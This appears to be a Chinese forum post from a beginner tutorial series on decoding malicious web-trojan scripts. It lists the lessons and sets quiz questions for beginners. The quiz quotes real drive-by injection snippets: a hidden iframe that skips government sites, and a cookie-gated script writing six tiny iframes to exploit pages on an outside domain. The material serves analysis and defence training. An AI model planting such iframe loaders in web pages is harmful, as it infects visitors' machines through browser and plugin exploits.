卡卡讲堂之网马解密 初级篇 卡卡讲堂之网马解密 中级篇 卡卡讲堂之网马解密 高级篇(swf网马解密)
卡卡讲堂之网马解密 高级篇(pdf网马解密)
1.
Freshow解密工具的详细用法;
2.
网马解密之——Eval篇;
3.
网马解密之——Document.write篇;
4.
网马解密之——Alpha2篇;
5.
网马解密之——Shellcode篇;
6.
网马解密之——Base64篇;
7.
网马解密之——US-ASCII篇;
8.
浅谈eval解密之——工具篇 网马解密的初级教程基本完成,为了加强初学者的记忆,根据初级教程的内容,编写几道小测试题,希望初学者能踊跃参与,跟帖进行讨论。(最好不要照抄原文哟,已自己能理解的方式来回答)
1.请列举出几种常见网页挂马方式;
2.常见网页挂马所利用的漏洞有哪些
3.请说出下列挂马方式属于哪一种挂马方式
a) if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://xxxo1.cn/a/a7.htm></iframe>")
document.write("</div>")}
b)<iframe src="cnzz.htm" width=111 height=0 border=0></iframe>
c)<script src="14.js"></script>
4.下列网页挂马用到了哪些系统的漏洞及第三方软件的漏洞
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=nishisb;expires="+ Then.toGMTString()
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/bf.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/swf.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/real2.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/old.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/09002.htm><\/iframe>");
document.writeln("<iframe width=100 height=1 src=http:\/\/cn.com.fengyunfz.com.cn\/images\/images\/tj.htm><\/iframe>");
}
}Get();
用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
